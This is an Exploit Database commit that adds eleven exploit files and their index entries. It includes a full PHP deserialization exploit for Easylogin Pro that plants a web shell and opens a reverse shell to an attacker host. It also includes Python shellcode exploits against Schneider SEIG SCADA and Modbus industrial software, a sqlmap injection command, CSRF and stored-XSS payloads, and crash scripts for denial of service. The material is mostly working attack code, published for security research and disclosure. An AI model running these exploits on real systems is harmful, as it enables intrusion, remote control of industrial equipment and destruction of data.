DB: 2018-08-21

11 changes to exploits/shellcodes

SEIG Modbus 3.4 - Denial of Service (PoC)
Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
Restorator 1793 - Denial of Service (PoC)
Prime95 29.4b7 - Denial Of Service (PoC)
SEIG SCADA System 9 - Remote Code Execution
SEIG Modbus 3.4 - Remote Code Execution
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution
WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
Countly - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-08-21 05:01:46 +00:00
parent f4745b8f85
commit 948806b29c
12 changed files with 737 additions and 0 deletions

View file

@ -0,0 +1,377 @@
#!/usr/bin/php
<?php
/*
Easylogin Pro Encryptor.php Unserialize Remote Code Execution Vulnerability
Version: 1.3.0
Platform: Ubuntu Server 18.04.1
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)
CVE: CVE-2018-15576
Notes:
======
- This is not really a security issue I guess, because you need to know the key.
But a simple disclosure bug could mean its game over for Easylogin Pro
- You will need PHP with threading support to run this exploit
- Laravel + Guzzle === lol
Example:
========
mr_me@pluto:~$ php -m | grep pthreads && php --version
pthreads
PHP 7.2.2 (cli) (built: Aug 10 2018 01:30:10) ( ZTS DEBUG )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.2, Copyright (c) 1999-2018, by Zend Technologies
mr_me@pluto:~$ ./e.php
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)
----------------------------------------------------
Usage: php ./e.php -t <ip> -c <ip:port>
-t: target server (ip with or without port)
-c: connectback server (ip and port)
Example:
php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337
----------------------------------------------------
mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337
Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
bug found by: @f99942
tekniq/exploit by: @steventseeley (mr_me)
(+) snap...
(+) crackle...
(+) pop!
(+) connectback from 172.16.175.137 via port 41860
www-data@target:/var/www/html/uploads$ id;uname -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
www-data@target:/var/www/html/uploads$ ls -la
total 12
drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 .
drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 ..
-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore
www-data@target:/var/www/html/uploads$ php --version
PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
www-data@target:/var/www/html/uploads$
*/
namespace GuzzleHttp\Cookie;
// change these to work against your target
$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB";
$path = "/var/www/html";
class Encrypter {
protected $key;
protected $cipher;
public function __construct($key, $cipher = 'AES-256-CBC'){
$key = (string) $key;
$this->key = $key;
$this->cipher = $cipher;
}
public function encrypt($value, $serialize = true){
$iv = random_bytes(openssl_cipher_iv_length($this->cipher));
$value = openssl_encrypt(
$serialize ? serialize($value) : $value,
$this->cipher, $this->key, 0, $iv
);
if ($value === false) {
throw new EncryptException('Could not encrypt the data.');
}
$mac = $this->hash($iv = base64_encode($iv), $value);
$json = json_encode(compact('iv', 'value', 'mac'));
if (json_last_error() !== JSON_ERROR_NONE) {
throw new EncryptException('Could not encrypt the data.');
}
return base64_encode($json);
}
public function encryptString($value){
return $this->encrypt($value, false);
}
protected function hash($iv, $value){
return hash_hmac('sha256', $iv.$value, $this->key);
}
}
// pop chain
interface ToArrayInterface {}
class SetCookie implements ToArrayInterface {
private $data;
public function __construct(array $data = []){
$this->data = $data;
}
}
class CookieJar implements ToArrayInterface {
private $cookies;
public function setCookie(SetCookie $cookie){
$this->cookies = array($cookie);
}
}
class FileCookieJar extends CookieJar {
private $filename;
public function __construct($bd_file, $cbh, $cbp){
$this->filename = $bd_file;
$this->setCookie(new SetCookie(array(
"Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
"Expires" => true,
"Discard" => false,
)));
}
}
class Exploit{
private $target;
private $targetport;
private $cbhost;
private $cbport;
private $key;
private $path;
public function __construct($t, $tp, $cbh, $cbp, $k, $p){
$this->target = $t;
$this->targetport = $tp;
$this->cbhost = $cbh;
$this->cbport = $cbp;
$this->key = $k;
$this->path = $p;
}
public function run(){
// its possible to leak the path if app.php contains 'debug' => true
// also, uploads is writable by default for avatars
$fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport);
$e = new Encrypter($this->key);
$this->p = $e->encryptString(serialize($fcj));
// hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login
$c = $this->do_get("index.php", array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p"));
if ($c === 500){
print "(+) pop!\r\n";
// start our listener
$s = new Shell($this->cbport);
$s->start();
// msf reverse shell with some stuff modified
$rs = <<<'PHP'
@error_reporting(-1);
@set_time_limit(0);
@ignore_user_abort(1);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='[cbhost]';
$port=[cbport];
function PtdSlhY($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\n";
}
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
if (strlen($o) === 0){
$o = "NULL";
}
return $o;
}
// we disappear like a fart in the wind
@unlink("si.php");
$nofuncs='no exec functions';
$s=@fsockopen("tcp://$ipaddr",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
}else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=PtdSlhY(substr($c,0,-1));
if($out===false){
fwrite($s, $nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
PHP;
$rs = str_replace("[cbhost]", $this->cbhost, $rs);
$rs = str_replace("[cbport]", $this->cbport, $rs);
$php = base64_encode($rs);
$this->do_get("uploads/si.php", array("si: $php"));
}
}
private function do_get($p = "index.php", array $h = []){
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => "http://$this->target/$p",
CURLOPT_HTTPHEADER => $h,
CURLOPT_PORT => (int) $this->targetport
));
$resp = curl_exec($curl);
return curl_getinfo($curl, CURLINFO_HTTP_CODE);
}
}
class Shell extends \Thread{
private $cbport;
public function __construct($cbp){
$this->cbport = $cbp;
}
public function run(){
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$ret = @socket_bind($sock, 0, (int) $this->cbport);
$ret = @socket_listen($sock, 5);
$msgsock = @socket_accept($sock);
@socket_close($sock);
$start = true;
$fp = fopen("php://stdin", "r");
while(false !== @socket_select($r = array($msgsock))){
if ($start === true){
if (socket_getpeername($r[0], $a, $p) === true){
print "(+) connectback from $a via port $p\r\n";
$s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n");
}
}
$start = false;
// the pretty shells illusion
print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ ";
// get our command...
$c = fgets($fp);
// if the attacker enters nothing, continue...
if (strpos("\n", $c) === 0){
continue;
}
if (strpos($c, "cd") === false){
print $this->exec_cmd($msgsock, $c);
}elseif (strpos($c, "cd") !== false){
$this->exec_cmd($msgsock, $c, false);
}
if(in_array($c, array("exit\n", "quit\n"))){
break;
}
}
fclose($fp);
}
private function exec_cmd($c, $cmd, $ret=true){
// send our command to the reverse shell
@socket_write($c, $cmd, strlen($cmd));
if ($ret == true){
// we don't care to get the shell prompt back...
$resp = trim(@socket_read($c, 2048, PHP_BINARY_READ));
if ($resp === "NULL"){
return "";
}else{
return $resp;
}
}
}
}
print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability
Bug found by: @f99942
Tekniq/exploit by: @steventseeley (mr_me)\r\n");
if ($argc < 3) {
print_r("
----------------------------------------------------
Usage: php ".$argv[0]." -t <ip> -c <ip:port>
-t: target server (ip with or without port)
-c: connectback server (ip and port)
Example:
php ".$argv[0]." -t 172.16.175.136 -c 172.16.175.137:1337
----------------------------------------------------
"); die; }
function set_args($argv) {
$_ARG = array();
foreach ($argv as $arg) {
if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) {
$_ARG[$reg[1]] = $reg[2];
} elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) {
$_ARG[$reg[1]] = "true";
} else {
$_ARG["input"][] = $arg;
}
}
return $_ARG;
}
$args = set_args($argv);
$host = $args["input"]["1"];
$cbsp = $args["input"]["2"];
if (strpos($host, ":") == true){
$host_and_port = explode(":", $host);
$host = $host_and_port[0];
$port = $host_and_port[1];
}else{
$port = 80;
}
if (strpos($cbsp, ":") == true){
$cbhost_and_cbport = explode(":", $cbsp);
$cbhost = $cbhost_and_cbport[0];
$cbport = $cbhost_and_cbport[1];
}else{
$cbport = 1337;
}
$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)";
if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){
// exploit entry
$poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path);
print "\r\n(+) snap...\r\n(+) crackle...\r\n";
$poc->run();
}
/*
eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu
RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi
VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2
a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3
WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh
MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh
NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9
*/
?>

View file

@ -0,0 +1,21 @@
# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection
# Exploit Author: Çlirim Emini
# Website: https://www.sentry.co.com
# Software Link: https://wordpress.org/plugins/chained-quiz/
# Version/s: 1.0.8 and below
# Patched Version: 1.0.9
# CVE : N/A
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112
# Vulnerability Description:
# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated
# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.
# Technical details:
# Chained Quiz appears to be vulnerable to time-based SQL-Injection.
# The issue lies on the $answer backend variable.
# Privileges required: None
# Proof of Concept (PoC):
sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T

View file

@ -0,0 +1,29 @@
# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
# Date: 2018-05-17
# Author: 0xB9
# Twitter: @0xB9Sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
# Version: 1.1
# Tested on: Ubuntu 18.04
# 1. Description:
# The plugin allows moderators to save notes and display them in a list in the modCP.
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs
# in the modCP & ACP.
# 2. Proof of Concept:
<html>
<body>
<-- Deletes mod note logs -->
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dal" alt="">
<-- Deletes mod notes -->
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dmn" alt="">
<!-- You can also delete notes individually by the nid (note ID)
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
-->
</body>
</html>

View file

@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
# Date: 2018-05-05
# Exploit Author: ManhNho
# Vendor Homepage: https://wordpress.org/plugins/tagregator/
# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip
# Ref: https://pastebin.com/ZGr5tyP2
# Version: 0.6
# Tested on: CentOS 6.5
# CVE : CVE-2018-10752
# Category : Webapps
# 1. Description
# WordPress Plugin Tagregator 0.6 - Stored XSS
# 2. Proof of Concept
1. Login to admin panel
2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram
Media/Flickr Post/Google+ Activities and click "Add New" button
3. In title field, inject XSS pattern such as:
<script>alert('xss')</script> and click Preview button
4. This site will response url that will alert popup named xss
5. Send this xss url to another administrators, we have same alert

View file

@ -0,0 +1,34 @@
############################################################################
# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
# Date: Monday - 2018 13 August
# Author: 10:10AM Team
# Discovered By: Sleepy
# Software Link: https://github.com/Countly/countly-server
# Version: All Version
# Category: Web-apps
# Security Risk: Critical
# Tested on: GNU/Linux Ubuntu 16.04 - win 10
############################################################################
# Exploit:
# Description:
#
# Attacker can use multiple parameters in the provided link to inject his own data in the database
# of this application,the injected data can then be directly viewed in the event logs panel
# (manage>logger).
# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS.
# The injected payload will be executed everytime that the target page gets visited/refreshed.
#
# Proof of Concept:
#
# Injection URL:
#
# <20> http://[server_ip]:[api_port]/i?api_key=[api_key]&parameter_1=[payload_1]&parameter_2=[payload_2]&etc...
#
# Execution URL(login to server dashboard and navigate to "event logs" panel):
#
# <20> http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
#
#
############################################################################
# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
############################################################################

View file

@ -0,0 +1,25 @@
# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-19
# Homepage: https://www.zortam.com
# Software Link: https://www.zortam.com/download.html
# Tested Version: 23.95
# Tested on OS: Windows 7 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the program click "Continue". In the new window paste the content of
# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

View file

@ -0,0 +1,25 @@
# Exploit Title: Restorator 1793 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-19
# Homepage: https://www.bome.com/
# Software Link: https://www.bome.com/bome/downloads/Restorator2018_Full_1793.exe
# Tested Version: v1793
# Tested on OS: Windows 7 x64
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window paste the content of
# "exploit.txt" into the following field: "Name". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 4000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

View file

@ -0,0 +1,31 @@
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
import time
ip = "192.168.127.137"
port = 27700
con = (ip, port)
header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"
header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)

View file

@ -0,0 +1,29 @@
# Exploit Title: Prime95 29.4b7 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-20
# Homepage: http://www.mersenne.org
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip
# Tested Version: 29.4b7
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program.
# In the new window click "Test" > "PrimeNet" > "Connection..".
# Now enter some test information into the fields until you reach the last field.
# Paste the content of "exploit.txt" into the last field: "Optional proxy password".
# Click "Ok" > "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

View file

@ -0,0 +1,67 @@
# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657
import socket
import struct
ip = "192.168.0.23"
port = 12397
con = (ip, port)
# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "\x00\x70\x00\x00\x00\x00\x00\x00"
# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644
# payload = length+message
# Exploit Magic
message_header = struct.pack("<L", 0x6014) + "\x66\x66\x07\x00"
message_protocol_data = "\x10\x00\x00\x00" + "\x19" + "\x00\x00\x00\x00\x00" + "\x04" + "\x00\x00\x00" + struct.pack(">H", 0x6000)
padding = "B" * 3344
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)
# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b '\x00\xFF\x0A\x0D' -f python
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
nopsleed = "\x41"*100 # \x90 bad char bypass
shellcode = "\xda\xcb\xbd\x0f\x83\x69\x70\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x4b\x83\xe8\xfc\x31\x68\x14\x03\x68\x1b\x61"
shellcode += "\x9c\xa9\xcf\xd8\x3a\xb3\x6e\xfc\x1c\x37\x54\xf6\xc7"
shellcode += "\x93\x5d\x47\xb3\xd2\x35\xb1\x3f\x7d\xdc\x42\xd7\x81"
shellcode += "\x59\x48\x93\x7b\x98\x70\x2a\x6b\x98\x14\xea\xc5\x54"
shellcode += "\x17\x7c\x8d\x25\x69\x60\x27\x1e\xc7\x8a\x6a\xd8\xcf"
shellcode += "\xb6\xc3\x9d\x5a\x83\xd6\xea\x88\x14\x7d\x5a\x55\x71"
shellcode += "\x90\x85\xb8\x37\x9e\x3e\xd7\x1a\x76\xf8\xb1\xb9\x63"
shellcode += "\xb7\xef\xa3\xa6\xc0\xb8\x12\xb4\x18\x62\x1a\xe1\x9e"
shellcode += "\x6f\x7e\xa2\x86\x6c\xf7\x3a\x31\xbd\x55\x42\x10\xad"
shellcode += "\x89\x16\xa0\xb8\x6a\xd6\x4c\x20\xd9\xad\x81\x58\x77"
shellcode += "\x0b\xa3\xaa\xba\x2c\x49\xf0\x26\xaa\xab\xce\x5a\xc3"
shellcode += "\x41\x69\x60\xc4\x58\x71\x71\x9c\x3f\xbe\xc2\xbc\x49"
shellcode += "\xdd\xab\x89\xf0\x46\xcb\x1a\x8a\xf1\xdb\xe5\x54\x1f"
shellcode += "\xfb\x30\x3b\xb1\x17\x97\xb2\x3e\x31\xf8\x26\x13\x9c"
shellcode += "\x16\xdd\x26\x7a\xe3\x9b\x6e\x29\x77\x49\xc7\x97\x98"
shellcode += "\x39\x7b\x5f\xcd\xeb\x4a\x39\x6e\x66\x04\xbc\x6c\xa6"
shellcode += "\x87\x01\x63\x4d\xf3\x35\xc9\x74\x35\xdf\xe7\x1f\x0c"
shellcode += "\xd0\x69\x80\x8c\x5c\xde\x63\xfc\x19\x1b\x8e\x24\x3b"
shellcode += "\x7e\x01\x97\x6f\x67\x8f\x07\x3f\x32\x13\x23\x80\x7e"
shellcode += "\x9a\x01\x5a\xc0\x3c\xf9\xf5\x5a\x04\xb0\x54\x46\x0c"
shellcode += "\xfb\x21\x4d\xd7\xe0\xb4\x02\xe5\x4c\x04\x5a\x5e\x37"
shellcode += "\xd1\x61\x6d\xe1\x4d\xe8\xa8\xdf\x26\xdb\x55\x5a\x60"
shellcode += "\x85\x68\x05\x6a\x21\x73\xdf\x73\xa4\xef\x26\x02\x7e"
shellcode += "\xb0\xb1\xa6\xb1\xac\x15\x0f\x80\x34\xae\xe4\x8a"
JUNK = "JUNK"*5202 # 20808 Bytes of JUNK
payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
print "Payload length: "+str(len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
s.recv(10)

View file

@ -0,0 +1,65 @@
# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
ip = "192.168.127.138"
port = 27700
con = (ip, port)
####### MESSAGE ##########
message_header = "\x00\x64"
message_buffer = "A" * 0x5dc
eip = struct.pack("<I", 0x7C9C167D)
# Shellcode generated with:
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
# Shellcode Size: 189 bytes
nopsleed = "\x90" * 100 # \x90 bad char bypass
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"
message = message_header + message_buffer + eip + nopsleed + shellcode
print "Message Len: " + hex(len(message)) + " bytes"
##########################
######## PKG HEADER ######
header_padding = "\x42\x42"
header_buf_size = "\xFF\xFF"
header_recv_len = struct.pack(">H", len(message))
header_end = "\x44"
header = header_padding + header_buf_size + header_recv_len + header_end
##########################
######## CRAFTING PAYLOAD ########
payload = header + message
print "Package Len: "+hex(len(payload)) + " bytes"
##################################
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)

View file

@ -6055,6 +6055,10 @@ id,file,description,date,author,type,platform,port
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45219,exploits/windows_x86/dos/45219.py,"SEIG Modbus 3.4 - Denial of Service (PoC)",2018-08-20,"Alejandro Parodi",dos,windows_x86,27700
45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16700,6 +16704,9 @@ id,file,description,date,author,type,platform,port
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39817,3 +39824,7 @@ id,file,description,date,author,type,platform,port
45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,
